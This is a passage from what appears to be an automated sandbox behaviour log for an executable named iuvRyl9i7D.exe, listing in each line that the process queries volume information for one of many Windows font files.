          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
